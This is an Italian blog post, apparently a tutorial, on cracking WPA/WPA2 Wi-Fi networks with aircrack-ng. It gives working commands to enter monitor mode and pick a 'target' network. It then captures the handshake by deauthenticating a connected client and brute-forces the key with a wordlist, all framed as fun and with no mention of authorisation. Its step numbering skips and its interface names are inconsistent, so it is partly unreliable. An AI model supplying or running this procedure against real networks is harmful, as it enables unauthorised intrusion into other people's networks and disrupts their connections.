Oggi parleremo di come cracckare una rete protetta da cifratura WPA o WPA2.
Il metodo è simile a quello usato per le reti WEP, con la differenza che qui abbiamo bisogno di un “Dizionario” (word list). Analizzando la rete dobbiamo catturare l’HANDSHAKE appartenente a quella rete e usare la FORZA BRUTA per trovare la PASSWORD.
In cosa consiste questa BRUTE FORCE? In pratica una volta trovato questo HANDSHAKE noi proviamo tutte le parole/lettere/numeri presenti nella nostra WORDLIST in modo da trovarne la PSK (pre shared key).
E’ facile capire che se noi abbiamo una wordlist da 10.000.000 di parole e la nostra password è alla fine di questa lista, ci vorrà molto tempo prima di trovare la password corretta. Solitamente un dual core può analizzare circa 300-400 pass al secondo. A questo problema ci viene in contro la nuova tecnologia CUDA di nVidia che permette di sfruttare la potenza di calcolo della nostra GPU (della scheda video), ma di questo ne parleremo in un altro articolo.
Dopo questa premessa, la prima cosa da fare per craccare una WPA/WPA2 è avere una buona WORDLIST. Queste si possono reperire molto facilmente su internet (GOOGLE) oppure è possibile crearsene una personale, ma anche di questo ne parleremo in un altro articolo.
Adesso che abbiamo la nostra wordlist, possiamo cominciare con il vero divertimento:
1) Mettiamo la nostra scheda wifi in monitor mode
sudo airmon-ng start wlan0
-wlan0 è l’interfaccia wifi (usare iwconfig da terminale per vedere la propria)
Molto probabilmente verrà creata un’interfaccia mon0 al posto di wlan0, noi useremo sempre mon0 dopo questo passaggio.
sudo airodump-ng –write cap mon0
- –write crea dei pacchetti cap.cap
- mon0 è l’interfaccia wlan0 in monitor mode
In questo modo possiamo vedere tutte le reti presenti nelle vicinanze e scegliere il nostro bersaglio.
sudo airodump-ng -c [canale AP] –bssid [MAC AP] –write cap mon0
Uguale a prima, ma in questo modo analizziamo solo i pacchetti di un singolo AP. La rete deve essere PSK (pre shared key) altrimenti non è possibile usare il brute force e quindi non è possibile tentare di craccarla.
aireplay-ng -0 5 -a [MAC AP] -c [MAC mia scheda] mon0
-0 è il deauthentication mode
-5 è il numero di gruppi di pacchetti deauthentication da mandare
Terminato questo comando, nella SHELL dove abbiamo eseguito il punto 3, dovremo vedere comparire il alto a destra “HANDSHAKE”, se questo non compare non possiamo cracckare la rete.
aircrack-ng -w [dizionario] -b [MAC AP] cap*.cap
-w dizionario è il nome del file dizionario
- *.cap è il l’lenco dei file di capture che abbiamo collezionato
Se tutto è andato a buon fine avremo come risultato un bellissimo KEY FOUND!
6) Cambiare il rate
iwconfig ath0 rate [auto,1M,2M,5.5M,6M,9M,11M,18M,24M,36M,48M,54M]
A volte la soluzione migliore può essere provare subito 1M come rate.
iwpriv ath0 mode 2
Mode 0 Automatic (a/b/g)
Mode 1 solo 802.11a
Mode 2 solo 802.11b
Mode 3 solo 802.11g
Mode 1 solo 802.11a
Mode 2 solo 802.11b
Mode 3 solo 802.11g

Nessun commento:
Posta un commento